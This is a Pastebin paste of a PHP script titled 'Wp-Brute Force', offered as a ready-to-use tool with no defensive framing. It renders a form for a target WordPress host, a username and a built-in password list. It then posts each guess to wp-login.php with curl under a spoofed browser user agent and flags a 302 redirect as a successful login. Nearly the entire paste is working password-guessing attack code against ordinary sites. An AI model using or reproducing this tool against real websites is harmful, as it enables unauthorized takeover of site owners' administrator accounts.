Advertisement
Guest User

Untitled

a guest
Sep 15th, 2018
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.28 KB | None | 0 0
  1. <?php
  2.    set_time_limit(0);
  3.    error_reporting(0);
  4.    
  5.    class Wp{
  6.    
  7.            private $host;
  8.            private $user;
  9.            private $open;
  10.            private $lista;
  11.    
  12.      public function banner() {
  13.       echo("
  14.      <html>
  15.      <head>
  16.      <title>Wp-Brute Force</title>
  17.      </head>
  18.      <body>
  19.      <h2>Wordpress Brute Force</h2>
  20.      <form action='' method='POST'>
  21.      Host:<input type='text' name='host' value='http://target.co.li/'><br>
  22.      User:<input type='text' name='user' value='admin'><br>
  23.      <center><textarea class='area' name='lista'>admin123456
  24.   master!@#$qwe
  25.   sumedang123
  26.   1qaz2wsx
  27.   b1smillah
  28.   house69
  29.   b1smillah
  30.   Suk4bum1
  31.   kasitaugakya
  32.   vro190588
  33.   agoes
  34.   admin123
  35.   meong
  36.   773062
  37.   #admin#
  38.   admin!@#
  39.   @dm1n
  40.   ADMIN
  41.   bs1unt46
  42.   Administrator
  43.   ADMINISTRATOR
  44.   !@#123!@#123
  45.   ngadimin
  46.   default
  47.   pass
  48.   sukmapts
  49.   password</textarea><br><br><center>
  50.      <center><input type='Submit' value='Start' style='width: 200px;'></center>
  51.      </form>
  52.      </body>
  53.     </html>");
  54.    }
  55.    
  56.        public function extract_post() {
  57.             $this->host = $_POST["host"];
  58.             $this->user = $_POST["user"];
  59.             $this->open = $_POST["lista"];
  60.           }
  61.    
  62.           public function Xregex() {
  63.             if(preg_match("@/wp-login.php@", $this->host)) {
  64.                 return true;
  65.             } else {
  66.                $this->host = $_POST["host"]."/wp-login.php";
  67.             }
  68.         }
  69.    
  70.          public function brute() {
  71.               $lista = array_filter(explode("\n", $this->open));
  72.               foreach($lista as $this->lista) {
  73.               for($i=0; $i < count($this->lista); $i++) {
  74.                            $this->Xcurl();
  75.                         }
  76.                  }
  77.           }
  78.    
  79.            private function cool() {
  80.                echo "Host:"."<font color='white'>{$this->host}</font>";
  81.                echo " User:"."<font color='white'>{$this->user}</font>";
  82.                echo " Pass:"."<font color='white'>{$this->lista}</font>";
  83.            }
  84.    
  85.            private function Xcurl() {
  86.                $curl = curl_init();
  87.                curl_setopt($curl, CURLOPT_URL, $this->host);
  88.                curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  89.                curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  90.                curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  91.                curl_setopt($curl, CURLOPT_POST, true);
  92.                curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  93.                $exec = curl_exec($curl);
  94.                $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  95.                $this->cool();
  96.                if($http == 302) {
  97.                     echo "<font color='#00FF00'> [+] Successfull!!</font><br>";
  98.                     break;
  99.                } else {
  100.                    echo "<font color='red'>Failed</font><br>";
  101.                }
  102.                    curl_close($curl);
  103.            }
  104.    }
  105.    
  106.    $wp = new Wp();
  107.    $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  108.    $wp->banner();
  109.    $wp->extract_post();
  110.    $wp->Xregex();
  111.    $wp->brute();
  112.    ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement